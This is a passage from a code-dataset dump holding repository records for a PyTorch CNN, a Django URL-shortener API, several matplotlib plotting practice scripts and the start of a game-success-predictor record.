"text": "import torch.nn as nn\nimport torch.nn.functional as F\n\nclass QuizDNN(nn.Module):\n\n def conv_block (self, in_channels, out_channels, kernel_size = 3, padding = 1):\n return nn.Sequential(\n nn.Conv2d(in_channels = in_channels, out_channels = out_channels, kernel_size = kernel_size, padding = padding, bias = False),\n nn.ReLU(),\n nn.BatchNorm2d(out_channels),\n nn.Dropout(0.01))\n\n def __init__(self, opts=[]):\n super(QuizDNN, self).__init__()\n self.input = self.conv_block(3, 32)\n self.conv1 = self.conv_block(32, 32)\n self.conv2 = self.conv_block(32, 32)\n self.conv3 = self.conv_block(32, 32)\n self.conv4 = self.conv_block(32, 32)\n self.conv5 = self.conv_block(32, 32)\n self.conv6 = self.conv_block(32, 32)\n self.conv7 = self.conv_block(32, 32)\n self.conv8 = self.conv_block(32, 32)\n self.pool = nn.MaxPool2d(2, 2)\n self.gap = nn.Sequential(nn.AvgPool2d(kernel_size=8))\n self.fc = nn.Linear(32, 10)\n\n def forward(self, x):\n x1 = self.input(x) # 32 x 32 x 32\n x2 = self.conv1(x1) # 32x32x32\n #print(x1.shape, x2.shape)\n x3 = self.conv2(x1 + x2) #32x32x32\n x4 = self.pool(x1 + x2 + x3) #16x16x32\n x5 = self.conv3(x4) #16x16x32\n x6 = self.conv4(x4 + x5) #16x16x32\n x7 = self.conv5(x4 + x5 + x6) #16x16x32\n x8 = self.pool(x5 + x6 + x7) #8x8x32\n x9 = self.conv6(x8) #8x8x32\n x10 = self.conv7(x8 + x9) #8x8x32\n x11 = self.conv8(x8 + x9 + x10) #8x8x32\n x12 = self.gap(x11) #1x1x32\n x13 = self.fc(x12.view(x12.size(0), -1)) #1x1x10\n x = x13.view(-1, 10)\n return F.log_softmax(x, dim=-1)\n"
}
] | 14 |
praneshsaminathan/url_shortener | https://github.com/praneshsaminathan/url_shortener | 3bed0b379b11f0992798b719b4797590c57ffb7d | 9e6f752d203cb8d40a628f4482bc98b64f8c8ff0 | aa6b5ec53eb542049c7af49a76e63b547500f036 | refs/heads/main | 2023-03-12T23:36:38.049854 | 2021-03-01T16:59:28 | 2021-03-01T16:59:28 | 343,488,510 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7649006843566895,
"alphanum_fraction": 0.7748344540596008,
"avg_line_length": 36.625,
"blob_id": "d1b553103752fab09732aa18bb11dbfa1b1389a5",
"content_id": "2aea541d0584db1497e69cac1dea6a415aa63e0f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 302,
"license_type": "permissive",
"max_line_length": 118,
"num_lines": 8,
"path": "/core/serializers.py",
"repo_name": "praneshsaminathan/url_shortener",
"src_encoding": "UTF-8",
"text": "from django.utils.translation import ugettext_lazy as _\nfrom rest_framework import serializers\n\nfrom core.models import URLInfo\n\n\nclass ShorterIRLSerializer(serializers.Serializer):\n url = serializers.URLField(max_length=250, min_length=None, allow_blank=False, label=_('URL'), help_text=_('URL'))\n\n"
},
{
"alpha_fraction": 0.4625000059604645,
"alphanum_fraction": 0.574999988079071,
"avg_line_length": 18.899999618530273,
"blob_id": "e787fa3150554f99e0216ae0e2c1fc449e256b2f",
"content_id": "7f13f38bfff4a23ea6d1b1a762deefef06d28dfe",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 400,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 20,
"path": "/README.md",
"repo_name": "praneshsaminathan/url_shortener",
"src_encoding": "UTF-8",
"text": "#URL Shortener\n\nURL: **http://127.0.0.1:8000/api/v1/url-shorten/**\ntype: **POST**\nBody: **URL **\n\nResponse: {\n \"full_url\": \"https://www.linkedin.com/feed/\",\n \"hash_url\": \"04ee8b6039\",\n \"clicks\": 0\n}\n\nURL: **http://127.0.0.1:8000/api/v1/full-url/--hash--/**\ntype: **GET**\n\nResponse: {\n \"full_url\": \"https://www.linkedin.com/feed/\",\n \"hash_url\": \"04ee8b6039\",\n \"clicks\": 0\n}\n\n\n"
},
{
"alpha_fraction": 0.720108687877655,
"alphanum_fraction": 0.720108687877655,
"avg_line_length": 32.45454406738281,
"blob_id": "71ecd8a15a0f3b20f2a46c606d1816b5e7f3f21b",
"content_id": "854d2e443940a16716691eb37dd48fe5cb6b51c6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 368,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 11,
"path": "/core/urls.py",
"repo_name": "praneshsaminathan/url_shortener",
"src_encoding": "UTF-8",
"text": "from django.urls import path, include\nfrom shorturl.utils.apps import get_api_url\n\nfrom .views import (\n ShorterAPIView, GetFullURLAPIView\n)\n\nurlpatterns = [\n path(get_api_url(url_name='url-shorten'), ShorterAPIView.as_view(), name='api-url_shorten'),\n path(get_api_url(url_name='full-url/<str:url_hash>'), GetFullURLAPIView.as_view(), name='api-full_url')\n]\n"
},
{
"alpha_fraction": 0.6041902899742126,
"alphanum_fraction": 0.6115515232086182,
"avg_line_length": 32.96154022216797,
"blob_id": "ef27f1f086998edea2ecc854f8a49dd271a63ec6",
"content_id": "09bc8d9f20f89db139b329bda16687e325abc4cd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1766,
"license_type": "permissive",
"max_line_length": 122,
"num_lines": 52,
"path": "/core/views.py",
"repo_name": "praneshsaminathan/url_shortener",
"src_encoding": "UTF-8",
"text": "from hashlib import md5\n\nfrom django.shortcuts import render\n\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom core.serializers import ShorterIRLSerializer\nfrom .models import URLInfo\n\n\nclass ShorterAPIView(APIView):\n serializer_class = ShorterIRLSerializer\n permission_classes = (AllowAny,)\n\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n url_info = URLInfo.objects.filter(full_url=serializer.validated_data.get('url'))\n if not url_info:\n\n url_info = URLInfo.objects.create(full_url=serializer.validated_data.get('url'),\n url_hash=md5(serializer.validated_data.get('url').encode()).hexdigest()[:10]\n )\n else:\n url_info = url_info.first()\n data = {\n \"full_url\": url_info.full_url,\n \"hash_url\": url_info.url_hash,\n \"clicks\": url_info.clicks\n }\n\n return Response(data, status=status.HTTP_200_OK)\n\n\nclass GetFullURLAPIView(APIView):\n permission_classes = (AllowAny,)\n\n def get(self, request, url_hash, *args, **kwargs):\n url_info = URLInfo.objects.filter(url_hash=url_hash)\n if url_info:\n url_info = url_info.first()\n data = {\n \"full_url\": url_info.full_url,\n \"hash_url\": url_info.url_hash,\n \"clicks\": url_info.clicks\n }\n\n return Response(data, status=status.HTTP_200_OK)\n\n return Response(status=status.HTTP_404_NOT_FOUND)\n"
},
{
"alpha_fraction": 0.5616438388824463,
"alphanum_fraction": 0.5821917653083801,
"avg_line_length": 26.25,
"blob_id": "eff7e49959fb1efbec772b56025ccc4956eb2f69",
"content_id": "f6973cce1750c0706e56d108d53b3d0a8fabb1d3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 438,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 16,
"path": "/shorturl/utils/apps.py",
"repo_name": "praneshsaminathan/url_shortener",
"src_encoding": "UTF-8",
"text": "\nfrom django.conf import settings\n\n\ndef get_api_url(name='api', version=settings.API_VERSION, app_name='', url_name=''):\n url = '{0}/{1}/'.format(name, version)\n\n if app_name and url_name:\n url = '{0}{1}/{2}/'.format(url, app_name, url_name)\n\n elif app_name and not url_name:\n url = '{0}{1}/'.format(url, app_name)\n\n elif url_name and not app_name:\n url = '{0}{1}/'.format(url, url_name)\n\n return url\n\n"
},
{
"alpha_fraction": 0.6640253663063049,
"alphanum_fraction": 0.665610134601593,
"avg_line_length": 36.117645263671875,
"blob_id": "2939e0980f7ac729580e64e50431c41eb255f34f",
"content_id": "eb4fdc0fe401f220e873f64d592426a58ee00696",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 631,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 17,
"path": "/core/models.py",
"repo_name": "praneshsaminathan/url_shortener",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass URLInfo(models.Model):\n full_url = models.URLField(unique=True, null=False, blank=False, help_text=_('full url'))\n url_hash = models.URLField(unique=True, null=False, blank=False, help_text=_('short url'))\n clicks = models.PositiveIntegerField(default=0)\n created_at = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return f'{self.url_hash} - {self.full_url} - {self.clicks}'\n\n class Meta:\n db_table = 'urlinfo'\n verbose_name = _('UrlInfo')\n verbose_name_plural = _('UrlInfo')\n"
},
{
"alpha_fraction": 0.5177383422851562,
"alphanum_fraction": 0.5354767441749573,
"avg_line_length": 30.10344886779785,
"blob_id": "ee3e752bc71caa13ab861b76923eb795455b7c0d",
"content_id": "e1ebb19701ca04d2220e437fb687f564fabc7a30",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 902,
"license_type": "permissive",
"max_line_length": 114,
"num_lines": 29,
"path": "/core/migrations/0001_initial.py",
"repo_name": "praneshsaminathan/url_shortener",
"src_encoding": "UTF-8",
"text": "# Generated by Django 3.1.7 on 2021-03-01 15:58\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='URLInfo',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('full_url', models.URLField(help_text='full url', unique=True)),\n ('url_hash', models.URLField(help_text='short url', unique=True)),\n ('clicks', models.PositiveIntegerField(default=0)),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ],\n options={\n 'verbose_name': 'UrlInfo',\n 'verbose_name_plural': 'UrlInfo',\n 'db_table': 'urlinfo',\n },\n ),\n ]\n"
}
] | 7 |
htianwvu/Matplotlib-Advanced | https://github.com/htianwvu/Matplotlib-Advanced | eb40dce1f075714a6136d7d4209f2b70e969af93 | bfb3ed51cd181514b84779a828c19112dd53c781 | 039f301602308e8753963ffb5d68c4eb2a47c07d | refs/heads/master | 2022-10-19T00:07:31.639968 | 2020-06-15T01:13:06 | 2020-06-15T01:13:06 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5219454169273376,
"alphanum_fraction": 0.6037959456443787,
"avg_line_length": 21.577465057373047,
"blob_id": "4794008f8cabf309d3323e18f360becfc1ec6268",
"content_id": "afbae4373ff7dc3f233dda8b2d5908edc6cfa0d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1738,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 71,
"path": "/matplotlib training top 3 movie bar.py",
"repo_name": "htianwvu/Matplotlib-Advanced",
"src_encoding": "UTF-8",
"text": "\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\na = [\"ape plant\",\"dekelok\",\"spiderman\",\"war wolf\"]\r\nb_16 = [15746,312,4497,319]\r\nb_15 = [12357,156,2045,168]\r\nb_14 = [2358,399,2358,362]\r\n\r\nx_14 = list(range(len(a)))\r\nx_15 = [i+0.2 for i in x_14]\r\nx_16 = [i+0.2*2 for i in x_14]\r\n\r\nbar_width = 0.2\r\nplt.figure(figsize=(20,8),dpi=80)\r\n\r\nplt.bar(x_14,b_14,width=bar_width,label=\"Sept 14\")\r\nplt.bar(x_15,b_15,width=bar_width,label=\"Sept 15\")\r\nplt.bar(x_16,b_16,width=bar_width,label=\"Sept 16\")\r\n\r\nplt.legend()\r\n\r\nplt.xticks(x_15,a,rotation=45)\r\n\r\nplt.show()\r\n\r\n\r\n\r\n##plt.xlim((-1,2))\r\n##plt.ylim((-1,3))\r\n\r\n##plt.plot(x,y1,label='me', color='r',linestyle='--', linewidth=5,alpha=0.7)\r\n\r\n##plt.xlabel('I am x', fontsize=16)\r\n##plt.ylabel('I am y',fontsize=16)\r\n##plt.title('Temperature change during the daytime',fontsize=18)\r\n\r\n## 调整图大小\r\n##plt.figure(figsize=(20,8),dpi=80)\r\n\r\n##文字太长,断开\r\n##\"The Shawshank\\n Redemption\"\r\n\r\n##轴刻度\r\n##plt.xticks(range((2,25,5))\r\n##plt.yticks(range(min(y),max(y)+2,2))\r\n\r\n##new_ticks = np.linspace(-1,2,5)\r\n##print(new_ticks)\r\n##plt.xticks(new_ticks)\r\n##plt.yticks([-2,-1.8,-1,1.22,3],\r\n ##['really bad','bad',r'$noraml\\ \\delta$','good','excellent'])\r\n\r\n##网格\r\n##plt.grid(alpha=0.4)\r\n\r\n##图例\r\nplt.legend(handles=[l1,l2],labels=['aaa','bbb'],loc='best')\r\n\r\n##文字轴的输入:\r\n##plt.bar(range(len(a)),b)\r\n##plt.xticks(range(len(a)),a,rotation=45)\r\n\r\n\r\n##gca\"get current axis'\r\n##ax = plt.gca()\r\n##ax.spines['right'].set_color('none')\r\n##ax.spines['top'].set_color('none')\r\n##ax.xaxis.set_ticks_position('bottom')\r\n##ax.yaxis.set_ticks_position('left')\r\n##ax.spines['bottom'].set_position(('data',0)) #outward, axes\r\n##ax.spines['left'].set_position(('data',0))\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.3576580286026001,
"alphanum_fraction": 0.5871871113777161,
"avg_line_length": 23.4891300201416,
"blob_id": "83f5d6f10e0eb18259a10c7945c04bbb0bd1a172",
"content_id": "d77e4a26424244528344d0c217090904e1fe873e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2409,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 92,
"path": "/matplotlib histomgraphy best movies.py",
"repo_name": "htianwvu/Matplotlib-Advanced",
"src_encoding": "UTF-8",
"text": "\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\na = [98,58,23,43,89,52,24,34,81,49,16,29,\r\n 74,36,17,26,67,34,18,25,68,29,29,20,\r\n 24,45,21,36,21,49,20,43,21,53,27,49,\r\n 30,60,28,52,34,68,34,64,41,73,42,73,\r\n 53,64,45,21,14,27,40,58,76,81,93,84,\r\n 70,57,45,43,34,29,36,51,65,72,81,93,\r\n 98,21,23,31,30,35,40,37,40,42,39,42,\r\n 46,42,34,45,54,53,37,49,60,67,40,57,\r\n 74,23,14,56,78,27,20,67,89,34,30,73,\r\n 83,43,32,85,98,50,36,101,123,63,46,125,\r\n 98,58,23,43,89,52,24,34,81,49,16,29,\r\n 74,36,17,26,67,34,18,25,68,29,29,20,\r\n 24,45,21,36,21,49,20,43,21,53,27,49,\r\n 30,60,28,52,34,68,34,64,41,73,42,73,\r\n 53,64,45,21,14,27,40,58,76,81,93,84,\r\n 70,57,45,43,34,29,36,51,65,72,81,93,\r\n 98,21,23,31,30,35,40,37,40,42,39,42,\r\n 46,42,34,45,54,53,37,49,60,67,40,57,\r\n 74,23,14,56,78,27,20,67,89,34,30,73,\r\n 83,43,32,85,98,50,36,101,123,63,46,125] \r\n\r\nplt.figure(figsize=(20,8),dpi=80)\r\n#calculate the group number\r\nd = 3\r\n\r\nnum_bins = (max(a)-min(a))//d\r\n\r\n# setup interval\r\n\r\nplt.xticks(range(min(a),max(a)+d,d),rotation=45)\r\n\r\n#plt.hist(a,num_bins)\r\n\r\n# frequency distribution\r\nplt.hist(a,num_bins,density = 1)\r\n\r\n\r\nplt.grid(alpha=0.4)\r\n\r\n\r\n\r\nplt.show()\r\n\r\n\r\n\r\n##plt.xlim((-1,2))\r\n##plt.ylim((-1,3))\r\n\r\n##plt.plot(x,y1,label='me', color='r',linestyle='--', linewidth=5,alpha=0.7)\r\n\r\n##plt.xlabel('I am x', fontsize=16)\r\n##plt.ylabel('I am y',fontsize=16)\r\n##plt.title('Temperature change during the daytime',fontsize=18)\r\n\r\n## 调整图大小\r\n##plt.figure(figsize=(20,8),dpi=80)\r\n\r\n##文字太长,断开\r\n##\"The Shawshank\\n Redemption\"\r\n\r\n##轴刻度\r\n##plt.xticks(range((2,25,5))\r\n##plt.yticks(range(min(y),max(y)+2,2))\r\n\r\n##new_ticks = np.linspace(-1,2,5)\r\n##print(new_ticks)\r\n##plt.xticks(new_ticks)\r\n##plt.yticks([-2,-1.8,-1,1.22,3],\r\n ##['really bad','bad',r'$noraml\\ \\delta$','good','excellent'])\r\n\r\n##网格\r\n##plt.grid(alpha=0.4)\r\n\r\n##图例\r\nplt.legend(handles=[l1,l2],labels=['aaa','bbb'],loc='best')\r\n\r\n##文字轴的输入:\r\n##plt.bar(range(len(a)),b)\r\n##plt.xticks(range(len(a)),a,rotation=45)\r\n\r\n\r\n##gca\"get current axis'\r\n##ax = plt.gca()\r\n##ax.spines['right'].set_color('none')\r\n##ax.spines['top'].set_color('none')\r\n##ax.xaxis.set_ticks_position('bottom')\r\n##ax.yaxis.set_ticks_position('left')\r\n##ax.spines['bottom'].set_position(('data',0)) #outward, axes\r\n##ax.spines['left'].set_position(('data',0))\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5341191291809082,
"alphanum_fraction": 0.6073200702667236,
"avg_line_length": 23.396825790405273,
"blob_id": "b529897d920a2d0d5eb715a0b8b5b3edc84482b4",
"content_id": "b89847fb7dc152e952be5432fb7d102d6263283e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1636,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 63,
"path": "/matplotlib girlfriend vs age for two persons-two curves.py",
"repo_name": "htianwvu/Matplotlib-Advanced",
"src_encoding": "UTF-8",
"text": "\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nx = range(10,30,1)\r\ny1 = [1,0,1,1,2,4,3,2,3,4,4,5,6,5,4,3,3,1,1,1]\r\ny2 = [1,0,3,1,2,3,3,3,2,1,2,1,1,1,1,1,1,1,1,1]\r\n\r\n\r\nplt.figure(figsize=(20,8),dpi=80)\r\n\r\nplt.xlabel('Ages',fontsize=16)\r\nplt.ylabel('# of girlfriend',fontsize=16)\r\nplt.title('Attraction over Ages',fontsize=18)\r\n\r\nplt.plot(x,y1,label='me', color='r',linestyle='--',linewidth=5,alpha=0.7)\r\nplt.plot(x,y2,label='deskmate')\r\n\r\nplt.xticks(range(10,30,1))\r\nplt.yticks(range(min(y1),max(y1)+2,1))\r\n\r\nplt.grid(alpha=0.5)\r\n\r\nplt.legend(labels=['me','deskmate'],fontsize=18,loc='upper left')\r\n\r\nplt.show()\r\n\r\n##plt.xlim((-1,2))\r\n##plt.ylim((-1,3))\r\n\r\n##plt.plot(x,y1,label='me', color='r',linestyle='--', linewidth=5,alpha=0.7)\r\n\r\n##plt.xlabel('I am x', fontsize=16)\r\n##plt.ylabel('I am y',fontsize=16)\r\n##plt.title('Temperature change during the daytime',fontsize=18)\r\n\r\n## 调整图大小\r\n##plt.figure(figsize=(20,8),dpi=80)\r\n\r\n\r\n##轴刻度\r\n##plt.xticks(range((2,25,5))\r\n##plt.yticks(range(min(y),max(y)+2,2))\r\n\r\n##new_ticks = np.linspace(-1,2,5)\r\n##print(new_ticks)\r\n##plt.xticks(new_ticks)\r\n##plt.yticks([-2,-1.8,-1,1.22,3],\r\n ##['really bad','bad',r'$noraml\\ \\delta$','good','excellent'])\r\n\r\n##网格\r\n##plt.grid(alpha=0.4)\r\n\r\n##图例\r\nplt.legend(handles=[l1,l2],labels=['aaa','bbb'],loc='best')\r\n\r\n##gca\"get current axis'\r\n##ax = plt.gca()\r\n##ax.spines['right'].set_color('none')\r\n##ax.spines['top'].set_color('none')\r\n##ax.xaxis.set_ticks_position('bottom')\r\n##ax.yaxis.set_ticks_position('left')\r\n##ax.spines['bottom'].set_position(('data',0)) #outward, axes\r\n##ax.spines['left'].set_position(('data',0))\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5008498430252075,
"alphanum_fraction": 0.6152974367141724,
"avg_line_length": 24.560606002807617,
"blob_id": "0c6f5fdfcc75bf4f77f36c8686fd289707921a71",
"content_id": "d9489aac32555fb32f79aa076326ed30037b0f85",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1789,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 66,
"path": "/matplotlib tempature vibration in 2 month scatter.py",
"repo_name": "htianwvu/Matplotlib-Advanced",
"src_encoding": "UTF-8",
"text": "\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\ny3 = [11,17,16,11,12,11,12,6,6,7,8,9,12,15,14,17,18,21,16,17,20,14,15,15,19,21,22,22,22,23]\r\ny10 =[26,26,28,19,21,17,16,19,18,20,20,19,22,23,17,20,21,20,22,15,11,15,5,13,17,10,11,13,12,13,6]\r\n\r\nx3= range(1,31,1)\r\nx10=range(51,82,1)\r\n\r\nplt.figure(figsize=(20,8),dpi=80)\r\n\r\nplt.scatter(x3,y3)\r\nplt.scatter(x10,y10)\r\n\r\n_x = list(x3)+list(x10)\r\n_xtick_labels = [\"Mar,{}\".format(i) for i in x3]\r\n_xtick_labels += [\"Oct,{}\".format(i-50) for i in x10]\r\nplt.xticks(_x[::2],_xtick_labels,rotation=45)\r\n\r\nplt.xlabel('Date', fontsize=16)\r\nplt.ylabel('Temperatures (C)',fontsize=16)\r\nplt.title('Temperature change during Two Months',fontsize=18)\r\n\r\nplt.legend(labels=['March','October'],loc='best',fontsize=18)\r\n\r\nplt.show()\r\n\r\n\r\n\r\n##plt.xlim((-1,2))\r\n##plt.ylim((-1,3))\r\n\r\n##plt.plot(x,y1,label='me', color='r',linestyle='--', linewidth=5,alpha=0.7)\r\n\r\n##plt.xlabel('I am x', fontsize=16)\r\n##plt.ylabel('I am y',fontsize=16)\r\n##plt.title('Temperature change during the daytime',fontsize=18)\r\n\r\n## 调整图大小\r\n##plt.figure(figsize=(20,8),dpi=80)\r\n\r\n\r\n##轴刻度\r\n##plt.xticks(range((2,25,5))\r\n##plt.yticks(range(min(y),max(y)+2,2))\r\n\r\n##new_ticks = np.linspace(-1,2,5)\r\n##print(new_ticks)\r\n##plt.xticks(new_ticks)\r\n##plt.yticks([-2,-1.8,-1,1.22,3],\r\n ##['really bad','bad',r'$noraml\\ \\delta$','good','excellent'])\r\n\r\n##网格\r\n##plt.grid(alpha=0.4)\r\n\r\n##图例\r\nplt.legend(handles=[l1,l2],labels=['aaa','bbb'],loc='best')\r\n\r\n##gca\"get current axis'\r\n##ax = plt.gca()\r\n##ax.spines['right'].set_color('none')\r\n##ax.spines['top'].set_color('none')\r\n##ax.xaxis.set_ticks_position('bottom')\r\n##ax.yaxis.set_ticks_position('left')\r\n##ax.spines['bottom'].set_position(('data',0)) #outward, axes\r\n##ax.spines['left'].set_position(('data',0))\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5474576354026794,
"alphanum_fraction": 0.6259887218475342,
"avg_line_length": 26.354839324951172,
"blob_id": "f8a2d1f9c30fd64cb7e5e03543eabb26dff37c0a",
"content_id": "571844bbe61bd4a3795857dd88fbd4e0af340f92",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1808,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 62,
"path": "/matplotlib training top 20 movie bar.py",
"repo_name": "htianwvu/Matplotlib-Advanced",
"src_encoding": "UTF-8",
"text": "\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\na = [\"Star Wars\",\"The Empire\\n Strikes Back\",\"The Godfather\",\"Raiders of \\nthe Lost Ark\",\"The Shawshank\\n Redemption\",\r\n \"Pulp Fiction\",\"Return of\\n the Jedi\",\"Back to the Future\",\"The Godfather\\n Part II\",\"Ikiru\",\"Fight Club\",\"GoodFellas\",\r\n \"Rear Window\",\"City Lights\",\"The Dark Knight\",\"Alien\",\"Casablanca\",\"The Silence of\\n the Lambs\",\"Seven Samurai\",\"The Shining\"]\r\nb = [1977,1980,1972,1981,1993,1994,1983,1985,1974,1952,1999,1991,1954,1931,2008,1979,1942,1991,1954,1980]\r\n\r\nplt.figure(figsize=(20,8),dpi=80)\r\n\r\nplt.barh(range(len(a)),b,height=0.2)\r\n\r\nplt.yticks(range(len(a)),a)\r\n\r\nplt.xlim((1950,2000))\r\n\r\nplt.show()\r\n\r\n\r\n\r\n##plt.xlim((-1,2))\r\n##plt.ylim((-1,3))\r\n\r\n##plt.plot(x,y1,label='me', color='r',linestyle='--', linewidth=5,alpha=0.7)\r\n\r\n##plt.xlabel('I am x', fontsize=16)\r\n##plt.ylabel('I am y',fontsize=16)\r\n##plt.title('Temperature change during the daytime',fontsize=18)\r\n\r\n## 调整图大小\r\n##plt.figure(figsize=(20,8),dpi=80)\r\n\r\n\r\n##轴刻度\r\n##plt.xticks(range((2,25,5))\r\n##plt.yticks(range(min(y),max(y)+2,2))\r\n\r\n##new_ticks = np.linspace(-1,2,5)\r\n##print(new_ticks)\r\n##plt.xticks(new_ticks)\r\n##plt.yticks([-2,-1.8,-1,1.22,3],\r\n ##['really bad','bad',r'$noraml\\ \\delta$','good','excellent'])\r\n\r\n##网格\r\n##plt.grid(alpha=0.4)\r\n\r\n##图例\r\nplt.legend(handles=[l1,l2],labels=['aaa','bbb'],loc='best')\r\n\r\n##文字轴的输入:\r\n##plt.bar(range(len(a)),b)\r\n##plt.xticks(range(len(a)),a,rotation=45)\r\n\r\n\r\n##gca\"get current axis'\r\n##ax = plt.gca()\r\n##ax.spines['right'].set_color('none')\r\n##ax.spines['top'].set_color('none')\r\n##ax.xaxis.set_ticks_position('bottom')\r\n##ax.yaxis.set_ticks_position('left')\r\n##ax.spines['bottom'].set_position(('data',0)) #outward, axes\r\n##ax.spines['left'].set_position(('data',0))\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5597723126411438,
"alphanum_fraction": 0.612270712852478,
"avg_line_length": 25.05172348022461,
"blob_id": "51b8d8fd226e893d851f6fb6cfadca0fd37c0d54",
"content_id": "0d98f39fddc70045743b6ae838bc3b58ac0abd42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1627,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 58,
"path": "/matplotlib tempature vibration 2hour curve.py",
"repo_name": "htianwvu/Matplotlib-Advanced",
"src_encoding": "UTF-8",
"text": "\r\nimport matplotlib.pyplot as plt\r\nimport random\r\n\r\nx = range(0,120)\r\ny = [random.randint(20,35) for i in range(120)]\r\n\r\nplt.figure(figsize=(20,8),dpi=80)\r\n\r\nplt.xlabel('Time(min)')\r\nplt.ylabel('Temperature (C)')\r\nplt.title('Temperature change during 10:00-11:00AM')\r\n\r\nplt.plot(x,y)\r\n\r\n# adjust x-axis linspace 步长和刻度\r\n_xtick_labels = [\"10h{}min\".format(i) for i in range(60)]\r\n_xtick_labels += [\"11h{}min\".format(i) for i in range(60)]\r\nplt.xticks(list(x)[::5],_xtick_labels[::5],rotation =45)\r\n\r\nplt.show()\r\n\r\n##plt.xlim((-1,2))\r\n##plt.ylim((-1,3))\r\n\r\n##plt.xlabel('I am x')\r\n##plt.ylabel('I am y')\r\n##plt.title('Temperature change during the daytime')\r\n\r\n## 调整大小\r\n##plt.figure(figsize=(20,8),dpi=80)\r\n\r\n\r\n##轴刻度\r\n##plt.xticks(range((2,25,5))\r\n##plt.yticks(range(min(y),max(y)+2,2))\r\n\r\n##new_ticks = np.linspace(-1,2,5)\r\n##print(new_ticks)\r\n##plt.xticks(new_ticks)\r\n##plt.yticks([-2,-1.8,-1,1.22,3],\r\n ##['really bad','bad',r'$noraml\\ \\delta$','good','excellent'])\r\n\r\n##随机选取整数\r\n## y = [random.randint(20,35) for i in range(120)]\r\n\r\n# adjust x-axis linspace 步长和刻度\r\n##_xtick_labels = [\"10h{}min\".format(i) for i in range(60)]\r\n##_xtick_labels += [\"11h{}min\".format(i) for i in range(60)]\r\n##plt.xticks(list(x)[::3],_xtick_labels[::3],rotation =45)\r\n\r\n##gca\"get current axis'\r\n##ax = plt.gca()\r\n##ax.spines['right'].set_color('none')\r\n##ax.spines['top'].set_color('none')\r\n##ax.xaxis.set_ticks_position('bottom')\r\n##ax.yaxis.set_ticks_position('left')\r\n##ax.spines['bottom'].set_position(('data',0)) #outward, axes\r\n##ax.spines['left'].set_position(('data',0))\r\n\r\n\r\n\r\n\r\n\r\n"
}
] | 6 |
ShawnAndrews/GamesSuccessPredictor | https://github.com/ShawnAndrews/GamesSuccessPredictor | c185f0c67213a72b114630f25ccb4cdd0a403e3f | 17031a7c5d95e496e549fe68388297d881336a58 | fd6966536325e17b21326c40a7e47ff65711ded9 | refs/heads/main | 2023-07-03T22:30:40.519627 | 2021-07-31T18:17:17 | 2021-07-31T18:17:17 | 390,100,064 | 3 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.64415043592453,
"alphanum_fraction": 0.6615598797798157,
"avg_line_length": 27.91666603088379,
"blob_id": "50b650cfd8f6f9f0a6d240e0e7ac1da8f9f41192",
"content_id": "a84b1039cbcdb1752a333903997977d6fd8313c7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1436,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 48,
"path": "/train.py",
"repo_name": "ShawnAndrews/GamesSuccessPredictor",
"src_encoding": "UTF-8",
